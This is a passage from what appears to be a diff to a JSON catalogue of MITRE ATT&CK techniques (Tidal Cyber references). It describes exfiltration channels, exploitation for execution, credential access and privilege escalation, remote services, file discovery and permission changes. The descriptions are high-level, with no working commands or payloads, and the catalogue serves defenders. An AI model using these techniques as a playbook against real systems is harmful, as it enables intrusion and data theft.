known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1048.002" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "b27b273b-77e7-4243-8b48-a735857c0708", + "value": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1048.001" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "848e3552-e89d-4981-a5a5-eaf610e6eb37", + "value": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.[[copy_cmd_cisco](https://app.tidalcyber.com/references/88138372-550f-5da5-be5e-b5ba0fe32f64)]\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1048.003" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "27041aa4-13e7-4d84-b1c7-02047beb5534", + "value": "Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)] On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).", + "meta": { + "platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + }, + { + "dest-uuid": "b27b273b-77e7-4243-8b48-a735857c0708", + "type": "similar" + }, + { + "dest-uuid": "848e3552-e89d-4981-a5a5-eaf610e6eb37", + "type": "similar" + }, + { + "dest-uuid": "27041aa4-13e7-4d84-b1c7-02047beb5534", + "type": "similar" + } + ], + "uuid": "192d25ea-bae1-48e4-88de-e0acd481ab88", + "value": "Exfiltration Over Alternative Protocol" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "89203cae-d3f1-4eef-9b5a-29042eb05d19", + "value": "Exfiltration Over C2 Channel" + }, + { + "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1011.001" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9", + "value": "Exfiltration Over Bluetooth" + }, + { + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + }, + { + "dest-uuid": "38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9", + "type": "similar" + } + ], + "uuid": "d8541e2d-6bdd-4ec0-95c4-c0f657502d5f", + "value": "Exfiltration Over Other Network Medium" + }, + { + "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1052.001" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "f424dade-21f3-4269-9940-ce64d93b97c4", + "value": "Exfiltration over USB" + }, + { + "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + }, + { + "dest-uuid": "f424dade-21f3-4269-9940-ce64d93b97c4", + "type": "similar" + } + ], + "uuid": "36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f", + "value": "Exfiltration Over Physical Medium" + }, + { + "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.[[RedHat Webhooks](https://app.tidalcyber.com/references/37321591-40fd-537e-ba74-71042bc5064e)] Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.[[Discord Intro to Webhooks](https://app.tidalcyber.com/references/bf5b3773-29cc-539a-a0f0-a6d1d63dee2d)] When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://app.tidalcyber.com/technique/26abc19f-5968-45f1-aa1f-f35863a2f804) of emails, chat messages, and other data.[[Push Security SaaS Attacks Repository Webhooks](https://app.tidalcyber.com/references/519693e2-71c9-55d2-98fd-be451837582a)] Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.[[Microsoft SQL Server](https://app.tidalcyber.com/references/a904fde8-b8f9-5411-ab46-0dacf39cc81f)]\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.[[CyberArk Labs Discord](https://app.tidalcyber.com/references/4b3cd2c0-fd0b-5583-8746-648229fc5f9d)][[Talos Discord Webhook Abuse](https://app.tidalcyber.com/references/affa93d8-5c8b-557d-80b4-1366df13d77a)][[Checkmarx Webhooks](https://app.tidalcyber.com/references/f68f1151-839e-5ae7-bab1-aa2b4c0d11ec)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1567.004" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca", + "value": "Exfiltration Over Webhook" + }, + { + "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1567.002" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "ce886c55-17ab-4c1c-90dc-3aa93e69bdb4", + "value": "Exfiltration to Cloud Storage" + }, + { + "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1567.001" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1", + "value": "Exfiltration to Code Repository" + }, + { + "description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://app.tidalcyber.com/technique/ec2a76e6-3530-43e1-9e80-686e4b214ac8)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.[[Pastebin EchoSec](https://app.tidalcyber.com/references/3fc422e5-9a1d-5ac4-8e65-1df13d8a688e)]\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://app.tidalcyber.com/technique/c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1), which highlight access to code repositories via APIs.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1567.003" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "8b6743e7-e856-5772-8b38-2c002602b365", + "value": "Exfiltration to Text Storage Sites" + }, + { + "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + }, + { + "dest-uuid": "4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca", + "type": "similar" + }, + { + "dest-uuid": "ce886c55-17ab-4c1c-90dc-3aa93e69bdb4", + "type": "similar" + }, + { + "dest-uuid": "c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1", + "type": "similar" + }, + { + "dest-uuid": "8b6743e7-e856-5772-8b38-2c002602b365", + "type": "similar" + } + ], + "uuid": "66768217-acdd-4b52-902f-e29483630ad6", + "value": "Exfiltration Over Web Service" + }, + { + "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "068df3d7-f788-44e4-9e6b-2ae443af1609", + "value": "Exploitation for Client Execution" + }, + { + "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. \n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)][[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)] Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)][[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)][[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", + "meta": { + "platforms": [ + "Azure AD", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "afdfa503-0464-4b42-a79c-a6fc828492ef", + "value": "Exploitation for Credential Access" + }, + { + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries [[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)], evade security logs [[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)], or deploy hidden infrastructure.[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "15b65bf2-dbe5-47bc-be09-ed97684bf391", + "value": "Exploitation for Defense Evasion" + }, + { + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)][[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)] Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).", + "meta": { + "platforms": [ + "Containers", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "9cc715d7-9969-485f-87a2-c9f7ed3cc44c", + "value": "Exploitation for Privilege Escalation" + }, + { + "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB [[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)] and RDP [[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)] as well as applications that may be used within internal networks such as MySQL [[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)] and web server services.[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "51ff4ada-8a71-4801-9cb8-a6e216eaa4e4", + "value": "Exploitation of Remote Services" + }, + { + "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)][[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)][[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)][[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)] Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)][[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)][[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a", + "value": "Exploit Public-Facing Application" + }, + { + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]\n\nAccess to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)] Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)][[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]", + "meta": { + "platforms": [ + "Containers", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4", + "value": "External Remote Services" + }, + { + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1", + "value": "Fallback Channels" + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)] Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "1492c4ba-c933-47b8-953d-6de3db8cfce8", + "value": "File and Directory Discovery" + }, + { + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)][[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68).[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1222.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5c6687f6-3539-4268-a6a4-2b98fdeac0fb", + "value": "Linux and Mac File and Directory Permissions Modification" + }, + { + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[[Hybrid Analysis Icacls1 June 2018](https://app.tidalcyber.com/references/74df644a-06b8-4331-85a3-932358d65b62)][[Hybrid Analysis Icacls2 May 2018](https://app.tidalcyber.com/references/5d33fcb4-0f01-4b88-b1ee-dad6dcc867f4)] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).[[Microsoft DACL May 